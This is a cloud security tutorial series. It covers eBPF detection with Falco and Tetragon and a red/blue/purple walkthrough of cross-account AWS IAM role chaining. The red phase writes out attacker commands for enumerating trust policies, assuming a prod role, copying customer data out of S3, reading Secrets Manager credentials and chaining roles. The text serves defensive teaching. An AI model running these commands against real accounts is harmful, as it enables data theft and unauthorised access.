    └── Falco (rule-based, declarative)
            └── /etc/falco/rules.d/*.yaml
                    └── falcosidekick
                            ├── Slack
                            ├── PagerDuty
                            ├── Elasticsearch
                            └── AWS Lambda (custom response)

The TC eBPF pod-level network policy post covers how Cilium and Tetragon share the same underlying kernel attachment points — understanding TC hooks helps explain why Tetragon’s network-level policies fire at the same layer as Cilium’s NetworkPolicy enforcement.

Falco with falcosidekick: complete local testing setup

Use this to validate your Falco rules before deploying to a cluster. It routes Falco alerts to Slack in real time.

# docker-compose.yml — local Falco + falcosidekick testing
# Requires: Docker with kernel headers or eBPF driver support
version: "3.8"

services:
  falco:
    image: falcosecurity/falco-no-driver:latest
    privileged: true
    volumes:
      - /var/run/docker.sock:/host/var/run/docker.sock
      - /dev:/host/dev
      - /proc:/host/proc:ro
      - /boot:/host/boot:ro
      - /lib/modules:/host/lib/modules:ro
      - /usr:/host/usr:ro
      - /etc/falco:/etc/falco
      - ./rules:/etc/falco/rules.d:ro
    depends_on:
      - falcosidekick
    # Falco pushes JSON events to falcosidekick over HTTP (port 2801)
    command: >
      /usr/bin/falco
        --modern-bpf
        -o "json_output=true"
        -o "http_output.enabled=true"
        -o "http_output.url=http://falcosidekick:2801/"

  falcosidekick:
    image: falcosecurity/falcosidekick:latest
    environment:
      SLACK_WEBHOOKURL: "${SLACK_WEBHOOK}"
      SLACK_MINIMUMPRIORITY: "warning"
      # Output field names contain dots, so they are read with "index"
      SLACK_MESSAGEFORMAT: >
        [{{.Priority}}] {{.Rule}}
        | pod={{index .OutputFields "k8s.pod.name"}}
        | ns={{index .OutputFields "k8s.ns.name"}}
        | cmd={{index .OutputFields "proc.cmdline"}}
    ports:
      - "2801:2801"

# Start the stack (set SLACK_WEBHOOK first)
export SLACK_WEBHOOK="https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
docker compose up -d

# Trigger a test alert: exec into any running container
docker exec -it <any-container> /bin/sh

# Check falcosidekick received it
curl -s http://localhost:2801/metrics | grep falcosidekick_inputs_total

Deploying Falco to Kubernetes with Helm

# Add Falco Helm repo
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

# Install Falco with eBPF driver (not kernel module — required in Kubernetes)
helm install falco falcosecurity/falco \
  --namespace falco \
  --create-namespace \
  --set driver.kind=modern_ebpf \
  --set falcosidekick.enabled=true \
  --set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK}" \
  --set falcosidekick.config.slack.minimumpriority=warning \
  --set-file customRules."purple-team\.yaml"=./rules/purple-team.yaml

# Verify Falco pods are running on all nodes
kubectl get pods -n falco -o wide

# Tail Falco logs for a specific node's pod
kubectl logs -n falco -l app.kubernetes.io/name=falco -f

# Validate a specific rule is loaded
kubectl exec -n falco <falco-pod> -- falco -L 2>/dev/null | grep "Shell Spawned"

What This Means for Each Prior Attack

Every attack in EP07 through EP10 had a detectable kernel-level signal that the standard telemetry stack missed. Here’s the detection mapping:

Episode	Attack	What Standard Telemetry Missed	eBPF Detection Signal
EP07	SSRF to EC2 IMDS	CloudTrail: nothing. VPC Flow Logs: 169.254.169.254 destination, 15-min delay, no PID	kprobe: `tcp_connect` to `169.254.169.254` from app process, with PID, comm, and container, in real time
EP08	Container escape via privileged mount	CloudTrail: nothing. Syslog: nothing	kprobe: `security_sb_mount()` from non-host mount namespace — namespace ID mismatch fires alert
EP09	Supply chain implant execution	CloudTrail: nothing (OS-level). GuardDuty: maybe if beacon calls AWS APIs	kprobe: `execve()` with anomalous parent chain — web process → shell → unknown binary from `/tmp`
EP10	Lateral movement via cross-account role chaining	CloudTrail: AssumeRole events present but no process context	kprobe: `tcp_connect` to the STS endpoint from a process that has no reason to call it (on compute where you control the kernel, which excludes Lambda itself): unexpected process identity

The table is not theoretical. It reflects what you would actually observe running these detection rules against the attack simulations in those episodes.

For the SSRF case (EP07): the connection to 169.254.169.254 from the web application process would fire within milliseconds of the exploit. VPC Flow Logs would record the same IP 10–15 minutes later, with no information about which process made it. By the time the flow log is queryable, the attacker has the IAM credentials and may have made subsequent API calls in a different region.

For the container escape (EP08): the mount() from a non-host mount namespace is the earliest detectable signal of the escape attempt. It fires before the attacker has host filesystem access. With action: Sigkill in the Tetragon policy, the process is terminated at this syscall — the escape does not complete.

⚠ Production Gotchas

Use the eBPF driver for Falco in Kubernetes, not the kernel module. The kernel module requires installing a kernel module on every node, which creates a dependency on kernel headers being present and compatible. The modern_ebpf driver (Falco 0.35+) uses BTF and CO-RE — it works on kernels 5.8+ without kernel module installation and survives kernel upgrades. In managed Kubernetes (EKS, GKE, AKS), the kernel module path often doesn’t work at all due to the OS image restrictions.

Test Tetragon’s Sigkill action exhaustively before enabling it in production. The Sigkill action terminates the process at the moment of the violating syscall — before it completes. This is powerful for prevention but catastrophic if your exclusions are wrong. Common false positive sources: debug containers (kubectl debug), init containers that perform legitimate mounts, Kubernetes admission webhooks calling shell scripts. Always deploy with action: Post first, tune for two weeks of normal traffic, then switch to Sigkill only on rules with zero false positives in your environment.

bpftrace is an investigation tool, not a production detector. bpftrace compiles and loads an eBPF program per invocation: it has no persistence, no alerting, and no output routing to your SIEM. It fits the incident response scenario described in the opening, with one caveat. It cannot answer “did this process make outbound connections in the last 30 minutes?” retroactively; it only shows what is happening from the moment you attach. For always-on detection, use Tetragon or Falco. Running bpftrace as a daemon substitute introduces overhead without the management plane that production tools provide.

The shell-in-container rule will fire on kubectl exec sessions. Any time an operator runs kubectl exec -it <pod> -- /bin/bash, the Falco rule above triggers. This is working as intended — kubectl exec is a post-compromise technique as well as an operational tool. Handle this with an exclusion on the user identity or namespace:

# Add to the rule condition to exclude operator kubectl exec sessions
# Map your cluster admin users or service account here
and not user.name in (cluster-admin-users)
and not k8s.ns.name in (ops-tooling, debug-ns)

High-frequency kprobes on hot paths add measurable overhead. Attaching to tcp_connect fires on every outbound connection from every process on the node. On a node handling hundreds of microservices with high connection rates (service mesh with short-lived connections), this adds CPU overhead. Profile before deploying. Tetragon’s namespace-scoped selectors (matchNamespaces: NotHost) help by skipping host-namespace processes. Filter as narrowly as your threat model allows.

Ring buffer overflow silently drops events on high-throughput nodes. Both Falco and bpftrace use kernel ring buffers to pass events to userspace. If the userspace consumer (the Falco daemon, the bpftrace process) cannot keep up with the event rate, the kernel drops events silently. Falco exposes a falco_events_dropped_total metric, so monitor it. If drops occur on high-throughput nodes, increase the syscall buffer size in the Falco configuration (the syscall_buf_size_preset setting in recent releases) and narrow the rule set so fewer events reach userspace.
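
To make "monitor it" concrete, the sketch below turns two samples of an events counter and a drops counter into a drop ratio. The function name, the sample values, and the 1% threshold are assumptions for illustration, and it assumes the events counter counts delivered events only; adapt it to whatever metrics source you actually scrape.

```python
def drop_ratio(prev_events, prev_drops, cur_events, cur_drops):
    """Fraction of events dropped between two samples of monotonic counters."""
    delivered = cur_events - prev_events
    dropped = cur_drops - prev_drops
    # A negative delta means a counter reset (agent restart); skip that interval.
    if delivered < 0 or dropped < 0 or delivered + dropped == 0:
        return 0.0
    return dropped / (delivered + dropped)


ALERT_THRESHOLD = 0.01  # hypothetical: alert when 1% or more of events are lost

ratio = drop_ratio(prev_events=1000, prev_drops=0, cur_events=1990, cur_drops=10)
if ratio >= ALERT_THRESHOLD:
    print(f"event drops at {ratio:.2%}, detection coverage is degraded")
```

A ratio is more useful than the raw counter because a busy node and a quiet node can report the same absolute number of drops while losing very different shares of their telemetry.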

Quick Reference

Use Case	Tool	Hook Type	Detection Latency
Ad-hoc outbound connection investigation	bpftrace	tracepoint:syscalls:sys_enter_connect	Real-time
Always-on container shell detection	Falco	eBPF modern driver / syscall	< 100ms
Container escape prevention	Tetragon + Sigkill	kprobe: security_sb_mount	Blocking (pre-completion)
Privilege escalation detection	Falco / bpftrace	tracepoint:syscalls:sys_enter_setuid	Real-time
Supply chain implant execution	Falco execve rule	eBPF modern driver	< 100ms
SSRF-to-metadata detection	Tetragon kprobe	kprobe: tcp_connect	Real-time
Lateral movement via unexpected STS call	Tetragon kprobe	kprobe: tcp_connect + process filter	Real-time
Audit trail for incident response	Tetragon JSON events	kprobe / tracepoint	Persistent, SIEM-routable

Tool	Best For	Not For
bpftrace	Ad-hoc node investigation during IR	Always-on production detection
Falco	Rule-based behavioral detection	Network-layer enforcement
Tetragon	Always-on detection + optional enforcement	Ad-hoc one-liner investigation

Key Takeaways

Detection engineering with eBPF closes the telemetry gap that CloudTrail, VPC Flow Logs, and syslog cannot close: OS-level process activity is only visible at the kernel syscall layer, and eBPF is the only production-grade mechanism that reads it without kernel module risk
Every attack in EP07 through EP10 has a real-time kernel-level signal — SSRF connections, container mount calls, unexpected execve chains, privilege escalation attempts — none of which appear in your current SIEM unless you’ve built this layer
Falco provides declarative, rule-based behavioral detection; Tetragon provides syscall-level enforcement that can terminate an attack before it completes — use both with complementary scopes
bpftrace is the incident response tool for asking the kernel a direct question right now; it is not a monitoring agent and should not be treated as one
The false positive problem is real and must be addressed before enabling enforcement: kubectl exec, debug containers, init containers with legitimate mounts — exclusions must be tuned per environment before moving from action: Post to action: Sigkill

What’s Next

EP11 closed the detection gap. You’ve instrumented the kernel, you’re receiving Falco alerts, Tetragon is firing on namespace-crossing mount attempts. Then the alert fires at 2:47 AM on a Sunday — not a test, not a false positive. Something got in.

EP12 is the playbook for the first 24 hours after a confirmed cloud breach: what to isolate and how without destroying forensic evidence, what to preserve before it rotates out of CloudTrail’s 90-day window, what eBPF data to capture while the node is still live, who to call and in what order, and how to avoid the common mistakes that turn a containable incident into a regulatory event. The response phase — where everything you built in EP04 through EP11 either pays off or reveals what you missed.


Cloud Lateral Movement: Cross-Account IAM Role Chaining Explained

July 4, 2026 by Vamshi Krishna Santhapuri

Reading Time: 12 minutes

TL;DR

Cloud lateral movement through IAM maps to OWASP A01: attackers move between cloud accounts by exploiting cross-account IAM trust relationships, with no network pivoting and no exploit, just a valid sts:AssumeRole call
The structural vulnerability is a trust policy scoped too broadly — arn:aws:iam::DEV_ACCOUNT:root instead of the specific Lambda execution role ARN — which lets any identity in the dev account assume the prod role
The full attack chain: compromised Lambda in dev account → enumerate cross-account trust policies → aws sts assume-role into prod → access data lake S3 bucket → exfiltrate before detection fires
CloudTrail is the primary detection surface: AssumeRole events where the principal account ID differs from the resource account ID are the signal; GuardDuty surfaces the pattern as Recon:IAMUser/UserPermissions
AWS Access Analyzer automatically flags overly-broad cross-account trust policies — it should be running in every account in your organization, not just the management account
The structural fix is three layers: scope trust policy to the specific source ARN, add ExternalId for confused deputy protection, and use AWS Organizations SCPs to restrict cross-account role assumptions to approved account pairs only

OWASP Mapping: A01 Broken Access Control — cross-account IAM trust policies that specify an entire account root as the principal, instead of a specific role ARN, give any identity in the source account the ability to pivot into the target account.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│               CROSS-ACCOUNT IAM LATERAL MOVEMENT                    │
│                                                                      │
│   DEV ACCOUNT (111111111111)                                         │
│   ┌────────────────────────────────────────────┐                    │
│   │  Lambda: api-processor                     │                    │
│   │  Execution Role: lambda-execution-role     │◄── COMPROMISED     │
│   │                                            │                    │
│   │  Attacker has: access key for this role    │                    │
│   └───────────────────┬────────────────────────┘                    │
│                        │                                             │
│                        │  sts:AssumeRole                             │
│                        │  (cross-account API call)                  │
│                        ▼                                             │
│   ┌─────────────────────────────────────────────┐                   │
│   │  TRUST POLICY CHECK (prod account role)     │                   │
│   │                                             │                   │
│   │  Principal: arn:aws:iam::111111111111:root  │                   │
│   │              ↑ TOO BROAD — any dev identity │                   │
│   └───────────────────┬─────────────────────────┘                   │
│                        │ ALLOW                                       │
│                        ▼                                             │
│   PROD ACCOUNT (222222222222)                                        │
│   ┌────────────────────────────────────────────┐                    │
│   │  Role: datalake-reader                     │                    │
│   │  Access: s3:GetObject on prod-datalake-*   │                    │
│   │          rds:Connect on prod-analytics-db  │                    │
│   │          secretsmanager:GetSecretValue      │                    │
│   └────────────────────┬───────────────────────┘                    │
│                         │                                            │
│                         ▼                                            │
│   customer-data.parquet, analytics schemas, DB credentials          │
│   ← exfiltrated in 23 minutes                                        │
└─────────────────────────────────────────────────────────────────────┘

IAM-based cloud lateral movement succeeds because the authentication step, the sts:AssumeRole call, works exactly as designed. The Lambda’s identity is valid. The cross-account trust policy explicitly allows it. AWS faithfully issues the temporary credentials. The entire attack is indistinguishable from legitimate application behavior at the API level, which is why the trust policy is the only reliable prevention point.

The Incident: Dev Lambda to Prod Data Lake

Post-breach analysis. The attacker didn’t find a zero-day. They found a GitHub repository.

A developer had committed an .env file to a public repo containing AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY for a Lambda execution role in the dev account. GitHub’s secret scanning flagged it and notified the security team — but the notification arrived 58 minutes after the commit. By then, an automated credential scanner had already found it, validated the keys, and passed them to an attacker.

That 58-minute window is the entire story.

The Lambda’s execution role was scoped to the dev account, so initial triage assumed the blast radius was limited to dev. It wasn’t. A previous sprint had set up a cross-account trust relationship so the Lambda could read from the prod data lake during a data quality audit. The trust policy on the datalake-reader role in prod read:

"Principal": {"AWS": "arn:aws:iam::111111111111:root"}

Not the Lambda’s specific execution role ARN. The entire dev account root. Any identity in the dev account — including the one the attacker now held — could assume datalake-reader in prod.

The attacker enumerated cross-account roles from inside the compromised Lambda context, found the trust relationship, assumed the prod role, listed the data lake S3 bucket, and exfiltrated 14 GB of customer data parquet files before the first GuardDuty finding surfaced.

The revelation: cloud lateral movement doesn’t require network pivoting. It requires finding one IAM trust relationship that’s too broad.

The compromise of the dev Lambda was recoverable — rotate credentials, remediate the repo, done. The cross-account trust policy turned it into a prod data breach.

Red Phase: The Cross-Account Attack Chain

Step 1: Enumerate Trust Policies from a Compromised Role

An attacker’s first move inside a cloud environment is always the same: establish who they are and what they can reach.

aws sts get-caller-identity
# Returns:
# {
#   "UserId": "AROAIOSFODNN7EXAMPLE:function-name",
#   "Account": "111111111111",
#   "Arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
# }

# List roles in the current account and their trust policies
# The trust policy (AssumeRolePolicyDocument) shows who can assume each role
aws iam list-roles \
  --query 'Roles[*].[RoleName,AssumeRolePolicyDocument]' \
  --output json | \
  jq '.[] | {
    role: .[0],
    principals: (.[1].Statement[].Principal.AWS // .[1].Statement[].Principal.Service)
  }'

# More targeted: find roles that have cross-account trust relationships
# Look for principal ARNs from a different account ID
# (the role name is bound before descending into the statements, and
#  Principal.AWS is normalized because it may be a string or a list)
aws iam list-roles --output json | \
  jq --arg own_account "111111111111" \
  '.Roles[] | .RoleName as $role |
    .AssumeRolePolicyDocument.Statement[] |
    [.Principal.AWS? // empty] | flatten | .[] |
    select(test($own_account) | not) |
    {role: $role, principal: .}'

# Simulate whether the current identity's own policies allow sts:AssumeRole on the target role
# The simulator evaluates identity-based policies only, not the prod role's trust policy;
# the assume-role call in Step 2 is the real test of the trust relationship
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::111111111111:role/lambda-execution-role \
  --action-names sts:AssumeRole \
  --resource-arns arn:aws:iam::222222222222:role/datalake-reader \
  --query 'EvaluationResults[0].EvalDecision' \
  --output text
# Returns: allowed
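
The same trust-policy enumeration is easy to run offline against saved `aws iam list-roles --output json` output, which is how a defender would audit it. The sketch below is a minimal Python equivalent of the jq filter; the function names are illustrative, and it assumes the trust policy documents are already decoded JSON objects, as the AWS CLI returns them.

```python
import re

# Matches the account ID in IAM and STS principal ARNs.
ACCOUNT_RE = re.compile(r"^arn:aws[a-z-]*:(?:iam|sts)::(\d{12}):")


def as_list(value):
    """Policy fields may hold one value or a list; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def cross_account_trusts(roles, own_account):
    """Return (role_name, principal) pairs whose AWS principal is outside own_account."""
    findings = []
    for role in roles:
        doc = role.get("AssumeRolePolicyDocument", {})
        for stmt in as_list(doc.get("Statement")):
            if stmt.get("Effect") != "Allow":
                continue
            principal = stmt.get("Principal", {})
            if principal == "*":
                findings.append((role["RoleName"], "*"))
                continue
            if not isinstance(principal, dict):
                continue
            for arn in as_list(principal.get("AWS")):
                match = ACCOUNT_RE.match(arn)
                # A bare 12-digit account ID is also a valid principal.
                account = match.group(1) if match else arn
                if account != own_account:
                    findings.append((role["RoleName"], arn))
    return findings
```

Run from the prod side with `own_account="222222222222"`, the datalake-reader role from the incident would be reported with the dev account root as its principal.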

Step 2: Assume the Cross-Account Role

# Assume the target role — this is the lateral movement step
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "recon-$(date +%s)" \
  --query 'Credentials'
# Returns:
# {
#   "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
#   "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
#   "SessionToken": "IQoJb3JpZ2luX2...(truncated)",
#   "Expiration": "2024-01-15T14:32:00Z"
# }

# Export the credentials to use in subsequent commands
export AWS_ACCESS_KEY_ID="ASIAIOSFODNN7EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2..."

# Confirm the new identity — now operating in prod account context
aws sts get-caller-identity
# {
#   "Account": "222222222222",  ← prod account
#   "Arn": "arn:aws:sts::222222222222:assumed-role/datalake-reader/recon-1705327920"
# }

Step 3: Enumerate and Exfiltrate from Prod

# What buckets are accessible from this role?
aws s3 ls

# Enumerate the data lake bucket
aws s3 ls --recursive s3://prod-datalake-bucket | \
  awk '{print $3, $4}' | \
  sort -rn | \
  head -20
# Shows: file sizes and paths
# 15728640  customer-data/2024/01/customer-data.parquet
# 8388608   analytics/sessions/session-events.parquet
# ...

# Exfiltrate: one ListObjectsV2 call plus one GetObject per object;
# these show up in CloudTrail only if S3 data events are enabled on the trail
aws s3 cp s3://prod-datalake-bucket/customer-data/2024/01/ /tmp/ \
  --recursive \
  --quiet

# Check for Secrets Manager access
aws secretsmanager list-secrets \
  --query 'SecretList[].{Name:Name,LastRotated:LastRotatedDate}' \
  --output table

aws secretsmanager get-secret-value \
  --secret-id prod/analytics-db/credentials \
  --query 'SecretString' \
  --output text

Step 4: Role Chaining — Staying in the Environment

Role chaining is assuming one role then using that session to assume another. It extends the attacker’s reach without returning to the original compromised identity.

# From the prod datalake-reader context, can we go further?
# Check what other roles trust this prod role, or what this role can assume
aws iam list-roles --output json | \
  jq '.Roles[] | 
    select(.AssumeRolePolicyDocument.Statement[].Principal.AWS? | 
      strings | 
      test("datalake-reader")
    ) | .RoleName'

# If the datalake-reader role has sts:AssumeRole permissions itself,
# the chain continues — each hop gets a fresh 1-hour session
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/analytics-admin \
  --role-session-name "second-hop-$(date +%s)"

Tools Attackers Use for Cloud Lateral Movement Enumeration

Pacu (Rhino Security Labs): Modular AWS exploitation framework. The iam__enum_users_roles_policies_groups and iam__privesc_scan modules map the full IAM graph and identify assumption paths automatically.

# Pacu: enumerate IAM and find assumable roles
pacu
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan

CloudFox (Bishop Fox): Designed specifically for finding attack paths in cloud environments. The role-trusts command enumerates role trust relationships, including cross-account principals, and resource-trusts does the same for resource policies.

# CloudFox: enumerate role trust relationships (who can assume which role)
cloudfox aws -p target-profile role-trusts -v2

# CloudFox: enumerate resource policies that trust other principals or accounts
cloudfox aws -p target-profile resource-trusts -v2

aws-recon: Broad enumeration tool that maps IAM, S3, EC2, RDS, Secrets Manager, and trust relationships across accounts in a single pass.

Blue Phase: Detection

CloudTrail Signal: Cross-Account AssumeRole

Every sts:AssumeRole call is logged in CloudTrail. Cross-account calls are the specific signal to filter for.

# Query CloudTrail for cross-account AssumeRole events in the last 24 hours
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --output json | \
  jq '.Events[].CloudTrailEvent | fromjson |
    # Bind the caller account first: inside "roleArn | ..." the dot is the ARN string
    .userIdentity.accountId as $acct |
    select(
      .requestParameters.roleArn != null and
      $acct != null and
      (.requestParameters.roleArn | contains(":" + $acct + ":") | not)
    ) |
    {
      time: .eventTime,
      source_identity: .userIdentity.arn,
      source_account: .userIdentity.accountId,
      assumed_role: .requestParameters.roleArn,
      session_name: .requestParameters.roleSessionName,
      source_ip: .sourceIPAddress
    }'

The CloudTrail event structure for a cross-account assumption looks like this:

{
  "eventSource": "sts.amazonaws.com",
  "eventName": "AssumeRole",
  "userIdentity": {
    "type": "AssumedRole",
    "accountId": "111111111111",
    "arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
  },
  "requestParameters": {
    "roleArn": "arn:aws:iam::222222222222:role/datalake-reader",
    "roleSessionName": "recon-1705327920"
  },
  "sourceIPAddress": "203.0.113.42",
  "userAgent": "aws-cli/2.13.0 Python/3.11.0 Linux/5.15.0"
}

The key fields: userIdentity.accountId is 111111111111 (dev), requestParameters.roleArn contains 222222222222 (prod). Those two account IDs not matching is the cross-account signal.
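
The account-ID comparison is small enough to express as a single predicate, which is useful when the events are already in a pipeline rather than in Athena. A minimal sketch, assuming each event is a decoded CloudTrail record shaped like the one above; the function name is illustrative.

```python
import re

# Captures the account ID from an IAM role ARN.
ROLE_ARN_ACCOUNT = re.compile(r"^arn:aws[a-z-]*:iam::(\d{12}):role/")


def cross_account_target(event):
    """Return the target account ID if this AssumeRole event crosses accounts, else None."""
    if event.get("eventName") != "AssumeRole":
        return None
    source = (event.get("userIdentity") or {}).get("accountId")
    # requestParameters is null on some failed calls, so guard each lookup.
    role_arn = (event.get("requestParameters") or {}).get("roleArn") or ""
    match = ROLE_ARN_ACCOUNT.match(role_arn)
    if not source or not match:
        return None
    target = match.group(1)
    return target if target != source else None


event = {
    "eventName": "AssumeRole",
    "userIdentity": {"accountId": "111111111111"},
    "requestParameters": {"roleArn": "arn:aws:iam::222222222222:role/datalake-reader"},
}
print(cross_account_target(event))
```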

An indicator of freshly stolen credentials: userAgent showing aws-cli for a role that normally only calls AWS APIs from the Lambda runtime, which goes through an AWS SDK (Boto3 for Python functions) and reports a different user agent. Lambda functions don’t call the CLI, so an aws-cli user agent on a Lambda role points to a human or automated tool using stolen credentials.
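
The user-agent heuristic can be sketched as a filter over CloudTrail events. The set of Lambda role names is an assumption you would maintain yourself (for example from your infrastructure-as-code inventory), and the function name is illustrative. A determined attacker can spoof the user agent, so treat a match as a lead rather than proof.

```python
def cli_use_of_lambda_role(event, lambda_role_names):
    """True when an assumed-role session of a known Lambda role reports an aws-cli user agent."""
    arn = (event.get("userIdentity") or {}).get("arn", "")
    # Assumed-role ARNs look like arn:aws:sts::<account>:assumed-role/<role-name>/<session-name>
    parts = arn.split("/")
    if len(parts) < 2 or not parts[0].endswith(":assumed-role"):
        return False
    role_name = parts[1]
    user_agent = event.get("userAgent") or ""
    return role_name in lambda_role_names and user_agent.startswith("aws-cli/")


suspicious = {
    "userIdentity": {
        "arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
    },
    "userAgent": "aws-cli/2.13.0 Python/3.11.0 Linux/5.15.0",
}
print(cli_use_of_lambda_role(suspicious, {"lambda-execution-role"}))
```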

Athena Query: Cross-Account Assumptions Across the Organization

-- Athena against S3-backed CloudTrail logs (org-level trail)
-- Finds all cross-account AssumeRole events in the past 7 days
-- Assumes the standard CloudTrail table DDL, where requestparameters is a JSON string
SELECT
  eventtime,
  useridentity.accountid AS source_account,
  useridentity.arn AS source_identity,
  json_extract_scalar(requestparameters, '$.roleArn') AS target_role,
  sourceipaddress,
  useragent,
  -- Flag: event occurred within the last 300 minutes
  CASE
    WHEN date_diff(
      'minute',
      from_iso8601_timestamp(eventtime),
      current_timestamp
    ) < 300 THEN 'RECENT'
    ELSE 'AGED'
  END AS session_age
FROM cloudtrail_logs
WHERE
  eventsource = 'sts.amazonaws.com'
  AND eventname = 'AssumeRole'
  AND errorcode IS NULL
  AND from_iso8601_timestamp(eventtime) > current_timestamp - interval '7' day
  -- Cross-account: caller account differs from the account in the target role ARN
  -- (compared row by row, not against the set of all target accounts)
  AND useridentity.accountid <> regexp_extract(
    json_extract_scalar(requestparameters, '$.roleArn'),
    'arn:aws:iam::(\d+):', 1
  )
ORDER BY eventtime DESC;

GuardDuty Findings for IAM Lateral Movement

GuardDuty surfaces the following finding types relevant to cross-account lateral movement:

Finding Type	What It Signals
`Discovery:IAMUser/AnomalousBehavior`	Identity enumerating IAM roles, policies, or permissions, consistent with Step 1 (replaces the retired `Recon:IAMUser/UserPermissions`)
`PrivilegeEscalation:IAMUser/AnomalousBehavior`	API calls attempting to gain elevated access (replaces the retired `PrivilegeEscalation:IAMUser/AdministrativePermissions`)
`UnauthorizedAccess:IAMUser/TorIPCaller`	Assumed role used from Tor exit node
`CredentialAccess:IAMUser/AnomalousBehavior`	Credential access pattern deviates from baseline
`Exfiltration:S3/AnomalousBehavior`	Anomalous S3 read activity that fires after the exfiltration in Step 3 (replaces the retired `Exfiltration:S3/ObjectRead.Unusual`)

# Pull active GuardDuty findings scoped to IAM lateral movement indicators
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

# Finding types use the current AnomalousBehavior names; the older
# Recon:IAMUser/* and S3 ObjectRead.Unusual types are retired
aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "Discovery:IAMUser/AnomalousBehavior",
          "PrivilegeEscalation:IAMUser/AnomalousBehavior",
          "CredentialAccess:IAMUser/AnomalousBehavior",
          "Exfiltration:S3/AnomalousBehavior"
        ]
      },
      "severity": {
        "GreaterThanOrEqual": 4
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    account: .AccountId,
    resource: .Resource.AccessKeyDetails.UserName,
    created: .CreatedAt
  }'

AWS Access Analyzer: Automated Trust Policy Audit

Access Analyzer scans all resource-based policies in the account and flags any that grant access to principals outside the account or organization. It surfaces the vulnerable trust policy before an attacker finds it.

# List all Access Analyzer findings — these are cross-account or public access grants
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query 'analyzers[0].arn' --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {
    id: .id,
    resource_type: .resourceType,
    resource: .resource,
    principal: .principal,
    action: .action,
    condition: .condition,
    created: .createdAt
  }'

An Access Analyzer finding for the vulnerable trust policy looks like:

{
  "id": "a1b2c3d4-...",
  "resourceType": "AWS::IAM::Role",
  "resource": "arn:aws:iam::222222222222:role/datalake-reader",
  "principal": {"AWS": "arn:aws:iam::111111111111:root"},
  "action": ["sts:AssumeRole"],
  "condition": {},
  "status": "ACTIVE"
}

The arn:aws:iam::111111111111:root principal with no condition block is the flag — the entire dev account, no restrictions.
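
When an account has many findings, a small triage filter helps pull out exactly this pattern. A minimal sketch, assuming findings are decoded from `list-findings` JSON in the shape shown above; the function name is illustrative.

```python
def is_unconditioned_account_root(finding):
    """True for an IAM role finding that trusts a whole account with no condition."""
    principal = (finding.get("principal") or {}).get("AWS", "")
    # An account can be named as ...:root or as a bare 12-digit account ID.
    whole_account = principal.endswith(":root") or (
        principal.isdigit() and len(principal) == 12
    )
    return (
        finding.get("resourceType") == "AWS::IAM::Role"
        and whole_account
        and not finding.get("condition")
    )


finding = {
    "resourceType": "AWS::IAM::Role",
    "resource": "arn:aws:iam::222222222222:role/datalake-reader",
    "principal": {"AWS": "arn:aws:iam::111111111111:root"},
    "action": ["sts:AssumeRole"],
    "condition": {},
    "status": "ACTIVE",
}
print(is_unconditioned_account_root(finding))
```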

Purple Phase: Structural Fixes

Fix 1: Scope the Trust Policy to the Specific Source ARN

This is the primary fix. The trust policy should name the exact role that needs access, not the account root.

// BAD — allows any identity in the dev account to assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:root"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

// GOOD: only the specific Lambda execution role can assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:role/lambda-execution-role"
      },
      "Action": "sts:AssumeRole",
      "Condition": {
        "StringEquals": {
          "sts:ExternalId": "prod-datalake-access-v1"
        }
      }
    }
  ]
}

# Update an existing trust policy to scope it properly
aws iam update-assume-role-policy \
  --role-name datalake-reader \
  --policy-document file://scoped-trust-policy.json
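
One way to keep account-root principals from creeping back in is to generate trust policies from code that refuses anything other than a specific role ARN. The sketch below is illustrative: the function name and the output file name are assumptions, and the ARN check is deliberately simple.

```python
import json


def scoped_trust_policy(source_role_arn, external_id=None):
    """Build a trust policy that names one role, optionally gated by an ExternalId."""
    if ":role/" not in source_role_arn or "*" in source_role_arn:
        raise ValueError("principal must be a specific role ARN, not an account root or wildcard")
    statement = {
        "Effect": "Allow",
        "Principal": {"AWS": source_role_arn},
        "Action": "sts:AssumeRole",
    }
    if external_id:
        statement["Condition"] = {"StringEquals": {"sts:ExternalId": external_id}}
    return {"Version": "2012-10-17", "Statement": [statement]}


policy = scoped_trust_policy(
    "arn:aws:iam::111111111111:role/lambda-execution-role",
    external_id="prod-datalake-access-v1",
)
# Write the document that update-assume-role-policy reads.
with open("scoped-trust-policy.json", "w") as handle:
    json.dump(policy, handle, indent=2)
```

Putting the guard in the generator means a reviewer sees a failed build instead of having to spot `:root` in a diff.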

